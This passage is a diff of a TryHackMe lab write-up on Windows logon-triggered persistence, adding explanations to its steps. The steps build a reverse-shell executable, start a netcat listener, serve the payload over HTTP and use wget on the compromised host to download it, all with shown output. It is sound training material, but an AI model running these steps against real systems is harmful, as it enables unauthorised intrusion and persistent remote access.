JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/Windows Local Persistence/Logon Triggered Persistence.md

 Final size of exe file: 7168 bytes
 Saved as: revshell.exe
 ```
-3. `nc -lvnp <PORT NUMBER>` from our Linux attack machine
+3. `nc -lvnp <PORT NUMBER>` from our Linux attack machine to open up a netcat listener that'll listen for inbound connections
 ```Bash
 root@ip-10-10-157-221:~# nc -lvnp 9999
 Listening on [0.0.0.0] (family 0, port 9999)
 ```
-4. `sudo python3 -m http.server` from our Linux attack machine
+4. `sudo python3 -m http.server` from our Linux attack machine to start a simple HTTP server on our attack machine to allow the compromised Windows machine to connect back to our attack machine and download the reverse shell payload that we just created
 ```Bash
 root@ip-10-10-157-221:~# sudo python -m http.server
 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
 ```
-5. `PowerShell` from the compromised Windows machine
+5. `PowerShell` from the compromised Windows machine to launch PowerShell
 ```PowerShell
 C:\Users\Administrator>powershell
 Windows PowerShell
 Copyright (C) Microsoft Corporation.
 All rights reserved.
 ```
-6. `wget http://<ATTACK MACHINE IP>:8000/<PAYLOAD NAME>.exe -O <PAYLOAD NAME>.exe` from the compromised Windows machine
+6. `wget http://<ATTACK MACHINE IP>:8000/<PAYLOAD NAME>.exe -O <PAYLOAD NAME>.exe` from the compromised Windows machine to download our payload from our attack machine and save it under a different name
 ```PowerShell
 PS C:\Users\Administrator> wget http://10.10.157.221:8000/revshell.exe -O revshell.exe
 ```
-7. `dir` from the compromised Windows machine
+7. `dir` from the compromised Windows machine display the files and directories that are in our current working directory to verify if the payload has been successfully downloaded from our attack machine, which it has
 ```PowerShell
 PS C:\Users\Administrator> dir